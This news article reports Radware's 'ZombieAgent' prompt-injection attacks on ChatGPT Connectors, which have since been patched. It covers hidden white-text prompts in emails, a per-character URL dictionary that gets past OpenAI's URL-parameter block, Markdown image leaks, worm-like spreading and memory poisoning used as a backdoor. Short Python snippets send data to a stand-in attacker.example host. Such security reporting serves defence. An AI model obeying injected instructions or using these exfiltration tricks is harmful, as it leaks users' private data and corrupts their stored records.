Researchers have found new ways to turn ChatGPT into a data exfiltration tool and even use it as a persistent backdoor. The techniques, dubbed ZombieAgent and since patched by OpenAI, fed hidden prompts through connected applications such as email and cloud storage to send data back to attackers in ways invisible to users.
Giving AI chatbots access to tools and external data sources to turn them into autonomous agents is among the biggest trends in AI right now. But security experts have repeatedly warned that this connectivity carries risk, especially because AI models cannot natively distinguish between passive data and instructions.
This shortcoming makes models susceptible to indirect prompt injection attacks, in which attackers override the user’s or system’s instructions with malicious prompts hidden in external data parsed by AI. This is a common security issue, and the attack surface is huge: documents, emails, web pages — anything the user might feed to the AI model.
The ZombieAgent attack devised by researchers from security firm Radware is no different. It takes advantage of the Connectors feature of ChatGPT, which allows users to link the chatbot to external apps such as email services; cloud storage drives like Google Drive or OneDrive; enterprise chat clients like Teams and Slack; support ticketing systems like Jira; code hosting services like GitHub; and more.
What these services have in common is that attackers can easily get malicious content into them to be parsed by ChatGPT, sometimes in stealthy ways. For example, in HTML emails or documents, attackers can hide malicious prompts as white text on a white background, use a very small font size, or tuck them into disclaimers and page footers that users usually skim over.
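As a rough illustration of this kind of concealment, the sketch below builds a hypothetical HTML email body in which an injected instruction is invisible to a human reader but still present as plain text for any model that parses the message. The wording, styling, and placeholder instruction are illustrative assumptions, not Radware's actual payload.

```python
# Hypothetical illustration only: text hidden in an HTML email body renders
# invisibly to a human reader but is still ordinary text to a parser.
hidden_instruction = "...injected instruction text would go here..."  # placeholder

email_body = f"""
<html>
  <body>
    <p>Hi team, please find the Q3 report attached.</p>
    <!-- White-on-white, tiny font: invisible when rendered, visible to a parser -->
    <span style="color:#ffffff; font-size:1px;">{hidden_instruction}</span>
    <!-- Footers and disclaimers are another spot readers tend to skim past -->
    <p style="color:#999999; font-size:10px;">This message and any attachments are confidential.</p>
  </body>
</html>
"""
print(email_body)
```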
“This combination of broad connector access and invisible or near-invisible prompt injection significantly amplifies the real-world impact and practicality of the attacks we describe,” the Radware researchers said in their report.
Zero-click attacks
In one demonstration, the attackers sent an email with hidden prompts to a Gmail account that was linked to ChatGPT via Connectors. When the user asked ChatGPT to summarize their inbox, the chatbot opened it, read the malicious email, and followed the instructions inside, which told it to exfiltrate the summary to an attacker-controlled server.
OpenAI includes a protection mechanism that blocks appending parameters to a URL. To bypass it, the researchers simply built a dictionary system in which every letter had a corresponding URL on their server, then asked ChatGPT to convert the text into a series of those URLs and access them. By checking their server's access logs, the researchers could see the requests and reconstruct the leaked message.
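A minimal sketch of how such a per-character URL dictionary could work in principle is shown below. The domain and the codepoint-based path scheme are made-up assumptions, not the researchers' actual setup; the point is that each character maps to a distinct, parameter-free URL, and whoever controls the server can rebuild the message from the order of requests in the access log.

```python
# Minimal, hypothetical sketch of a per-character URL dictionary.
# attacker.example and the /c/<codepoint> scheme are invented for illustration.
BASE = "https://attacker.example/c/"

def text_to_urls(text: str) -> list[str]:
    """Map each character to a parameter-free URL; the message is encoded
    purely in which URLs are requested and in what order."""
    return [f"{BASE}{ord(ch):04x}" for ch in text]

def urls_to_text(requested_urls: list[str]) -> str:
    """Rebuild the message from the ordered list of requested URLs,
    as could be read back out of a web server's access log."""
    return "".join(chr(int(url.rsplit("/", 1)[-1], 16)) for url in requested_urls)

urls = text_to_urls("meeting at 4pm")
print(urls[:2])            # ['https://attacker.example/c/006d', 'https://attacker.example/c/0065']
print(urls_to_text(urls))  # 'meeting at 4pm'
```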
The same URL-based dictionary approach was used by researchers from security firm Tenable in another series of attack demonstrations against ChatGPT in November. Another method of leaking data is to make ChatGPT load images via Markdown formatting in its interface, with the image URLs pointing at the attackers' server.
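The Markdown variant relies on the same general idea: if the interface renders an injected image reference, the client fetches the image URL, and the data rides along in the request. A hypothetical example of such a snippet, with an invented domain and encoding:

```python
# Hypothetical illustration of Markdown-based image exfiltration: rendering this
# Markdown would cause the client to request the image URL, carrying the encoded
# text to the server hosting it. Domain and path scheme are made up.
import urllib.parse

leaked_text = "summary of the user's inbox"
markdown = f"![status](https://attacker.example/pixel/{urllib.parse.quote(leaked_text)})"
print(markdown)
```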
Worm-like propagation
The email attack even has worming capabilities: the malicious prompts could instruct ChatGPT to scan the inbox, extract email addresses from other messages, exfiltrate those addresses to the attackers using the URL trick, and send similar poisoned messages to those addresses as well.
If the victim is an employee of an organization that uses ChatGPT, chances are high that their inbox contains emails from colleagues, and those colleagues could have ChatGPT connected to their email accounts as well. It's worth noting that Gmail is just an example here; the attack would work with any email service that ChatGPT has a connector for, including Microsoft Outlook.
The researchers also showed that the attack works with prompts embedded in documents, whether files the victim manually uploads to ChatGPT for analysis or documents shared with them through their cloud storage service.
Enabling a persistent backdoor
ChatGPT uses a Memory feature to remember important information about the user and their past conversations. Memories can be created manually, when the user asks the chatbot to remember something, or automatically, when ChatGPT determines that certain information is important enough to save for later.
To limit potential abuse, such as malicious instructions being saved to memory, the feature is disabled in chats where Connectors are in use. However, the researchers found that ChatGPT can still read, create, modify, and delete memories based on instructions inside a file.
This can be used to combine the two attack techniques into a persistent data-leaking backdoor. First, the attacker sends the victim a file with hidden prompts that modify ChatGPT’s memory to add two instructions: 1) save to memory all sensitive information the user shares in chats, and 2) every time the user sends a message, open their inbox, read the attacker’s email with subject X, and execute the prompts inside, which leak the stored information.
The ability to modify ChatGPT’s memory is dangerous in its own right, because memory can hold important information about the user, such as medical conditions and treatments.
“We also demonstrated non-exfiltration damage, such as manipulating stored medical history and causing harmful, misleading medical advice,” the researchers wrote.
These attack techniques were reported to OpenAI in September and were fixed on Dec. 16, but they are unlikely to be the last attacks demonstrated against ChatGPT. Similar vulnerabilities have been found in other AI chatbots and LLM-powered tools in the past, and because prompt injection has no complete fix, there will always be bypasses for the guardrails put in place to prevent it.